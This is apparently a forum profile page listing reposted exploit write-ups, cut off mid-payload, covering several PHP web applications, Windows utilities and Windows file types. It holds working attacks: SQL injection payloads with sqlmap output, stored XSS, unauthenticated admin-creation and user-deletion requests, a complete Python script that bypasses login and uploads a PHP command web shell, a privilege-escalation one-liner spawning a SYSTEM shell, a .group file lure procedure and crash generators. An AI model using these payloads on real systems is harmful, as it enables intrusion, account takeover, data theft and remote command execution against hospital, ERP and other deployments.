Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    MSN Password Recovery 1.30 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC) # Date: 2020-01-02 # Vendor Homepage: https://www.top-password.com/ # Software Link: https://www.top-password.com/download/MSNPRSetup.exe # Exploit Author: Gokkulraj # Tested Version: v1.30 # Tested on: Windows 7 x64 # 1.- Download and install MSN Password Recovery # 2.- Run python code : MSN Password Recovery.py # 3.- Open CRASH.txt and copy content to clipboard # 4.- Open MSN Password Recovery and Click 'EnterKey' # 5.- Paste the content of CRASH.txt into the Field: 'User Name and Registration Code' # 6.- click 'OK' you will see a crash. #!/usr/bin/env python Dos= "\x41" * 9000 myfile=open('CRASH.txt','w') myfile.writelines(Dos) myfile.close() print("File created")
  2. HireHackking

    Microsoft Windows .Group File - Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Windows .Group File - Code Execution # Date: 2020-01-01 # Exploit Author: hyp3rlinx # Vendor Homepage: www.microsoft.com # Version: 1.9.6 # Tested on: Windows # CVE : N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt [+] twitter.com/hyp3rlinx [+] apparitionsec@gmail [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Windows ".Group" File Type Gorup files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows. It contains a list of contacts saved into a group; which can be used to create a mailing list for sending email messages to multiple addresses at once. [Vulnerability Type] URL Field Code Execution [CVE Reference] N/A [Security Issue] Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details" tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability affecting Windows .contact files that remains unfixed as of the time of this writing and has a metasploit module available. [References] http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt Therefore, attacker supplied executables can run unexpected to the user, who thinks they visit a website when click the Website go button. Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is internet downloaded or copied from network share. This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain if not in the Contacts directory. Advisory released for the sake of completeness and user security awareness. [Exploit/POC] 1) create a Windows .group file 2) create a directory named "http" 3) create an executable file with a .com ext (change .exe to .com) like www.microsoft.com an place it in the "http" dir alongside .group file. 4) point the website URL to the executable using path traversal like "http.\www.microsoft.com" which is the website address in the .group file. Note: the directory traversal can also point to other dirs like ..\Downloads\http.\microsoft.com but downside is the URL looks very sketchy. 5) package it up in an archive .rar etc. 6) send the .group file via email, or download it and lure the user to place the archive in the "c:\User\<victim>\Contacts" directory. 7) open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder if not within that dir already) next click the website address go button. The attackers executable will run instead of navigating to a website as would be expected by an end user. [Severity] High [Disclosure Timeline] Vendor Notification: Same type vuln affecting .contact files disclosed January 16, 2019, status remains unfixed. January 1, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  3. HireHackking

    Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection # Discovery Date: 2019-09-20 # Exploit Author: Hakan TAŞKÖPRÜ # Vendor Homepage: http://karakuzu.info/ # Effected Version <= 5.7.0 Vulnerability #1: Unauthenticated SQL Injection ================================================== Type: Error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND 1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))-- DhDH&k_yetki_duz=USER&kullanici_duzenle= Type: Time-based blind Title: Oracle AND time-based blind Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND 6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)-- VuHD&k_yetki_duz=USER&kullanici_duzenle= POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle= Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and k_sifre_duz parameters are injectable/vulnerable. Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User Management Panel ======================================================================================= Description : An attacker can stole an admin’s cookie. POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)" autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit= Vulnerability #3: Unauthenticated Creating Admin User ====================================================== Description : An attacker can create an admin or normal account. Request: POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit= Vulnerability #4: Unauthenticated Deleting User ============================================= Description : An attacker can delete an admin or normal account. POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded kullanici_sil=k_adi_duz=USERNAME_TO_DELETE Vulnerability #5: Unauthenticated Editing User =============================================== Description : An attacker can change a user’s password or role(e.g ROOT). POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle= ### History ============= 2019-09-20 Issue discovered 2019-11-19 Vendor contacted (No response) 2020-01-03 Issue published
  4. HireHackking

    Online Course Registration 2.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Course Registration 2.0 - Remote Code Execution # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-course-registration-free-download/ # Version: v2.0 # Category: Webapps # Tested on: Xampp for Windows # Description: Attacker can bypass login page and access to student change password dashboard. PoC Request (Authentication Bypass): POST /onlinecourse/index.php HTTP/1.1 Host: target regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit= There isn't any file extension control in student panel "My Profile" section. An unauthorized user can upload php file as profile image. First PoC Request (RCE): POST /onlinecourse/my-profile.php HTTP/1.1 Host: target -----------------------------16046344889164047791563222514 Content-Disposition: form-data; name="photo"; filename="simple.php" Content-Type: application/x-php <?php $cmd=$_GET["cmd"]; echo `$cmd`; ?> Second PoC Request (RCE): GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1 Host: target Below basic python script will bypass authentication and execute command on target server. import requests import sys if (len(sys.argv) !=3) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath " print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse " exit(0) rhost = sys.argv[1] command = sys.argv[2] url = "http://"+rhost+"/index.php" data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} with requests.Session() as session: #bypass authentication lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False) if check.status_code == 200: print "[+] Authentication bypass was successfull" else: print "[-] Authentication bypass was unsuccessful" sys.exit() #upload simple php file files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')} fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""} furl = "http://"+rhost+"/my-profile.php" session.post(url=furl, files= files, data=fdata) #execution final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command) #check execution if final.status_code == 200: print "[+] Command execution completed successfully." print "\tPut on a happy face!\n" else: print "[-] Command execution was unsuccessful." sys.exit() print final.text online-course-registration-rce.png poc.py import requests import sys if (len(sys.argv) !=3) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath " print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse " exit(0) rhost = sys.argv[1] command = sys.argv[2] url = "http://"+rhost+"/index.php" data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} with requests.Session() as session: #bypass authentication lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False) if check.status_code == 200: print "[+] Authentication bypass was successfull" else: print "[-] Authentication bypass was unsuccessful" sys.exit() #upload simple php file files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')} fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""} furl = "http://"+rhost+"/my-profile.php" session.post(url=furl, files= files, data=fdata) #execution final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command) #check execution if final.status_code == 200: print "[+] Command execution completed successfully.\n" print "\tPut on a happy face!\n" else: print "[-] Command execution was unsuccessful." sys.exit() print final.text
  5. HireHackking

    Hospital Management System 4.0 - 'searchdata' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection # Google Dork: N/A # Date: 2020-01-02 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hospital-management-system-in-php/ # Version: v4.0 # Tested on: Windows # CVE : CVE-2020-5192 # The Hospital Management System 4.0 web application is vulnerable to # SQL injection in multiple areas, listed below are 5 of the prominent # and easy to exploit areas. ================================ 1 - SQLi ================================ POST /hospital/hospital/hms/doctor/search.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 22 Origin: https://10.0.0.214 DNT: 1 Connection: close Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 Upgrade-Insecure-Requests: 1 searchdata=&search= ?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login. POST parameter 'searchdata' is vulnerable. sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests: --- Parameter: searchdata (POST) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search= --- [15:49:58] [INFO] testing MySQL [15:49:58] [INFO] confirming MySQL [15:49:58] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.4.1 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [15:49:58] [INFO] fetching database names available databases [6]: [*] hms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test ================================ 2 - SQLi ================================ GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests: --- Parameter: viewid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp [15:54:21] [INFO] fetching database names available databases [6]: [*] hms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login ================================ 3 - SQLi ================================ Parameter: bs (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit= ?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient ================================ 4 - SQLi ================================ POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php Content-Type: application/x-www-form-urlencoded Content-Length: 111 Origin: https://10.0.0.214 DNT: 1 Connection: close Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 Upgrade-Insecure-Requests: 1 patname= patname parameter is vulnerable to SQLi under the add patient in the doctor login ================================ 5 - SQLi ================================ --- Parameter: cpass (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123 --- available databases [6]: [*] hms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: http://10.0.0.214 DNT: 1 Connection: close Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5 Upgrade-Insecure-Requests: 1 cpass=123&npass=123&cfpass=123&submit=123 the ?cpass parameter is vulnerable to blind SQL injection
  6. HireHackking

    Hospital Management System 4.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-01-02 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hospital-management-system-in-php/ # Version: v4.0 # Tested on: Windows # CVE : CVE-2020-5191 ================ 1. - Cross Site Scripting (Persistent) ================ URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php Method : POST Parameter: doctorspecilization Attack : </td><script>alert("XSS");</script><td> POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php Content-Type: application/x-www-form-urlencoded Content-Length: 97 Origin: http://10.0.0.214 DNT: 1 Connection: close Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit= ?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed
  7. HireHackking

    BloodX 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: BloodX 1.0 - Authentication Bypass # Author: riamloo # Date: 2019-12-31 # Vendor Homepage: https://github.com/diveshlunker/BloodX # Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip # Version: 1 # CVE: N/A # Tested on: Win 10 # Discription: # An standalone platform which lets donors, receivers, organizers and sponsers to merge. # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost//BloodX-master/login.php POST /BloodX-master/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 63 Referer: http://localhost/BloodX-master/login.php Cookie: PHPSESSID=qusaqht0gvh0f97vbf44ep3iu Connection: keep-alive Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
  8. HireHackking

    SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotFTP 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.SpotFTP Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  9. HireHackking

    NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install NetShareWatcher 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.NetShareWatcher Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  10. HireHackking

    Complaint Management System 4.0 - 'cid' SQL injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.0 # Tested on: Windows 7 # CVE : N/A Description: The Complaint Management System v4.0 application from PHPgurukul is vulnerable to blind SQL injection via the 'cid' parameter which is found on the complaint-details.php page. ========== 1. SQLi ========== SQLMAP POC: GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests: --- Parameter: cid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+' --- The ?cid parameter is vulnerable to sql injection within the the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2 request: GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot Upgrade-Insecure-Requests: 1
  11. HireHackking

    Plantronics Hub 3.13.2 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation # Date: 2020-01-2 # Exploit Author: Markus Krell - @MarkusKrell # Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf # Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe # Version: Plantronics Hub for Windows prior to version 3.14 # Tested on: Windows 10 Enterprise # CVE : N/A As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner: <WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD> Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session. You may of course call any other binary you can plant on the machine. Steps for exploitation (PoC): - Open cmd.exe - Navigate using cd C:\ProgramData\Plantronics\Spokes3G - echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config
  12. HireHackking

    Dairy Farm Shop Management System 1.0 - 'username' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: Chris Inzinga # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows # CVE: N/A # The Dairy Farm Shop Management System 1.0 web application is vulnerable to # SQL injection in multiple areas. The most severe of these is the username # parameter on the login page as this injection can be done unauthenticated. ================================ 'username' - SQLi ================================ POST /dfsms/index.php HTTP/1.1 Host: 192.168.0.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.33/dfsms/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 34 Connection: close Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg Upgrade-Insecure-Requests: 1 username=test&password=test&login= --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'category' & 'categorycode' - SQLi ================================ POST /dfsms/add-category.php HTTP/1.1 Host: 192.168.0.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.33/dfsms/add-category.php Content-Type: application/x-www-form-urlencoded Content-Length: 39 Connection: close Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg Upgrade-Insecure-Requests: 1 category=test&categorycode=test&submit= --- Parameter: category (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 --- Parameter: categorycode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'companyname' - SQLi ================================ --- Parameter: companyname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'productname' & 'productprice' - SQLi ================================ --- Parameter: productname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit= --- --- Parameter: productprice (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'fromdate' & 'todate' - SQLi ================================ --- Parameter: todate (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit= Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit= Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit= Parameter: fromdate (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit= --- ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================ --- Parameter: emailid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update= --- --- Parameter: adminname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: adminname=Admin' AND (SELECT 5969 FROM 